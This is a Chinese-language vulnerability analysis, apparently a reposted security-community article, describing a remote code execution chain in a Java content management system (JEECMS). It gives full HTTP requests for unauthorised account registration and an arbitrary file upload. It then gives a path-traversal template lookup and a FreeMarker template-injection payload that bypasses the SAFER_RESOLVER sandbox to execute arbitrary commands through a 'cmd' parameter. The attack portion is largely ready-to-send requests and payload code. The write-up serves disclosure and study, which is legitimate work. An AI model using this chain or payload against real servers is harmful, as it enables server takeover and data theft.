某内容管理系统RCE漏洞分析

admin 2021年6月10日11:30:25评论897 views字数 5248阅读17分29秒阅读模式

本文首发于奇安信攻防社区

社区有奖征稿


· 基础稿费、额外激励、推荐作者、连载均有奖励,年度投稿top3还有神秘大奖!

· 将稿件提交至奇安信攻防社区(点击底部 阅读原文 ,加入社区)


点击链接了解征稿详情



0x01 前言

CMS对用户输入校验不严,攻击者可以配合前台任意文件上传和服务端模板注入执行任意代码,从而控制服务器权限。

0x02 任意注册

首先需要先登录会员。如果站点正常开放会员注册的话,直接注册即可。

但对于一种更严格的情况,就是当站点关闭会员注册时,需要通过别的手段来登录。这里可以利用第三方登录的功能,通过/thirdParty/bind接口可以实现注册并且能够直接登录(该接口在关闭第三方登录时仍旧有效)。

  1. POST /thirdParty/bind HTTP/1.1

  2. Host: 192.168.17.128

  3. User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0

  4. Accept: */*

  5. Accept-Language: en-US,en;q=0.5

  6. Accept-Encoding: gzip, deflate

  7. Content-Type: application/json

  8. Redirect-Header: false

  9. X-Requested-With: XMLHttpRequest

  10. Content-Length: 80

  11. {"username":"user123456","loginWay": 1, "loginType": "QQ", "thirdId": "abcdefg"}

username和thirdId参数可以随意设置,请求成功后就可以获得登录凭证(JSESSIONID或JEECMS-Auth-Token)

某内容管理系统RCE漏洞分析

0x03 任意文件上传

/member/upload/o_upload接口允许会员向服务器上传文件,系统主要通过UploadService.doUpload()实现上传功能,但它没有对后缀名进行有效检查,所以攻击者可以上传任意后缀的文件,上传路径会回显在结果中(目录为/u/cms/www/,文件名随机,后缀用户可控)。

某内容管理系统RCE漏洞分析

某内容管理系统RCE漏洞分析

某内容管理系统RCE漏洞分析

某内容管理系统RCE漏洞分析

根据接口直接上传

某内容管理系统RCE漏洞分析

测试发现,上传jsp文件是不能被解析的,而且由于目录固定,也不能向类加载路径上传jar文件,要想执行代码的话,得进一步借助FreeMarker模板。

0x04 模板注入

FrontCommonController会根据请求/{page}.htm的page参数,生成模板文件的路径。FrontUtils.getTplAbsolutePath() 会将page参数中的“-”替换成“/”,FrontUtils.frontPageData()进一步在结果的前部拼接上模板目录(/WEB-INF/t/cms/www/default)、在后部拼接上后缀(.html)。我们可以构造适当的page参数,使得能访问到上传的模板文件,比如/..-..-..-..-..-u-cms-www-20210X-121948454xbn.htm对应到文件/u/cms/www/20210X/12194845

某内容管理系统RCE漏洞分析

某内容管理系统RCE漏洞分析

某内容管理系统RCE漏洞分析

接下来的关键是如何利用FreeMarker执行代码。

FreeMarker提供了很多内建函数,使得模板开发更加灵活,但也增加了危险性。

new内建函数用于实例化实现了TemplateModel接口的类,FreeMarker自带了几个符合要求的类,可以用于执行代码,用法如下:

  1. <#assign value="freemarker.template.utility.Execute"?new()>${value("calc.exe")}

  2. <#assign value="freemarker.template.utility.ObjectConstructor"?new()>${value("java.lang.ProcessBuilder","calc.exe").start()}

  3. <#assign value="freemarker.template.utility.JythonRuntime"?new()><@value>import os;os.system("calc.exe")</@value>

但是,FreeMarker也提供了相应措施来限制这些类的使用,通过Configuration.setNewBuiltinClassResolver(TemplateClassResolver)可以限制new内建函数对类的访问。官方提供了三个预定义的解析器:

UNRESTRICTED_RESOLVER:简单地调用ClassUtil.forName(String)。

SAFER_RESOLVER:和第一个类似,但禁止解析ObjectConstructor,Execute和freemarker.template.utility.JythonRuntime。

ALLOWS_NOTHING_RESOLVER:禁止解析任何类。

JEECMS使用了SAFER_RESOLVER解析器,导致上述的几个类失效。

api内建函数也常用于模板注入,通常利用它来获取类的classLoader,以此来加载恶意类:

  1. <#assign classLoader=Object?api.class.getClassLoader()>

  2. ${classLoader.loadClass("our.desired.class")}

但是api内建函数必须在配置项api_builtin_enabled为true时才有效,而该配置在2.3.22版本之后默认为false,JEECMS也没有手动去开启它。

new、api两个常用的内建函数都失效了,这里就得利用到数据模型所暴露的对象了。这些暴露出的对象可以在模板中访问,可以通过它拿到classLoader。

注意FrontCommonController.java第80行,调用了FrontUtils.frontData(),用于向数据模型添加对象,FrontUtils.frontData()的第250行添加了一个CmsSite对象,它就是一个合适的目标。

某内容管理系统RCE漏洞分析

由于FreeMarker内置了一份危险方法名单 unsafeMethods.properties,禁用了很多可用的方法,下面列举了部分:

  1. java.lang.Class.getClassLoader()

  2. java.lang.Class.newInstance()

  3. java.lang.Class.forName(java.lang.String)

  4. java.lang.Class.forName(java.lang.String,boolean,java.lang.ClassLoader)

  5. java.lang.reflect.Constructor.newInstance([Ljava.lang.Object;)

  6. java.lang.reflect.Method.invoke(java.lang.Object,[Ljava.lang.Object;)

很多获取classLoader的途径被封禁,这导致我们不能直接通过site.getClass().getClassLoader()拿到类加载器,但我们可以利用site.getClass().getProtectionDomain().getClassLoader(),因为ProtectionDomain.getClassLoader()不在黑名单中。

Constructor.newInstance被禁使得我们不能直接实例化对象,Method.invoke被禁使得我们不能直接调用方法。这里要做的是寻找一个类的静态成员对象(public static final),然后执行它的静态方法。

FreeMarker自带的ObjectWrapper类就是一个不错的选择,它的DEFAULT_WRAPPER字段是一个实例化后的ObjectWrapper对象,而ObjectWrapper的newInstance方法(继承自BeansWrapper)可以用于实例化一个类,我们只需要向它传入被禁用的freemarker.template.utility.Execute进行实例化,返回的对象就可以直接用于执行系统命令。

某内容管理系统RCE漏洞分析

某内容管理系统RCE漏洞分析

完整的模板可以这样写,通过控制http请求的cmd参数就可以执行任意命令:

  1. ${site.getClass().getProtectionDomain().getClassLoader().loadClass("freemarker.template.ObjectWrapper").getField("DEFAULT_WRAPPER").get(null).newInstance(site.getClass().getProtectionDomain().getClassLoader().loadClass("freemarker.template.utility.Execute"), null)(cmd)}

0x05 配合利用-RCE

结合文件上传,上传成功后,访问相应URL执行系统命令:

  1. POST /member/upload/o_upload HTTP/1.1

  2. Host: 192.168.17.128

  3. User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:84.0)  Firefox/84.0

  4. Accept: text/html,application/xhtml+XML,application/XML;q=0.9,image/webp,*/*;q=0.8

  5. Accept-Language: en-US,en;q=0.5

  6. Accept-Encoding: gzip, deflate

  7. JEECMS-Auth-Token: eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiJ1c2VyMTIzNDU2IiwiY3JlYXRlZCI6MTYxMDQ0MDA5NzA4NywidXNlclNvdXJjZSI6ImFkbWluIiwiZXhwIjoxNjExMzA0MDk3fQ.12x-PtfuHIIC3aF7vV7kocd6KRwZr72SVUxbm74FdjD2WHKZ9IZm1n0cVMZdVgoFuzLuF4a8DKqmFhYX07mc5g

  8. Content-Type: multipart/form-data; boundary=---------------------------1250178961143214655620108952

  9. Content-Length: 604

  10. Connection: close

  11. Upgrade-Insecure-Requests: 1

  12. -----------------------------1250178961143214655620108952

  13. Content-Disposition: form-data; name="uploadFile"; filename="a.html"

  14. Content-Type: text/html

  15. ${site.getClass().getProtectionDomain().getClassLoader().loadClass("freemarker.template.ObjectWrapper").getField("DEFAULT_WRAPPER").get(null).newInstance(site.getClass().getProtectionDomain().getClassLoader().loadClass("freemarker.template.utility.Execute"), null)(cmd)}

  16. -----------------------------1250178961143214655620108952

  17. Content-Disposition: form-data; name="typeStr"

  18. File

  19. -----------------------------1250178961143214655620108952--

某内容管理系统RCE漏洞分析

END



【版权说明】本作品著作权归带头大哥所有,授权补天漏洞响应平台独家享有信息网络传播权,任何第三方未经授权,不得转载。




某内容管理系统RCE漏洞分析
带头大哥

一个神秘且优秀的补天白帽子


敲黑板!转发≠学会,课代表给你们划重点了

复习列表





特斯拉TBONE漏洞分析


关于影响超600W设备的通用型路由循环漏洞分析


某邮件系统后台管理员任意登录分析


代码审计之eyouCMS最新版getshell漏洞


某行业通用流程管控平台RCE之旅


某开源ERP最新版SQL与RCE的审计过程

某内容管理系统RCE漏洞分析


分享、点赞、在看,一键三连,yyds。
某内容管理系统RCE漏洞分析


点击阅读原文,加入社区,获取更多技术干货!


本文始发于微信公众号(台下言书):某内容管理系统RCE漏洞分析

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年6月10日11:30:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   某内容管理系统RCE漏洞分析https://cn-sec.com/archives/395275.html

发表评论

匿名网友 填写信息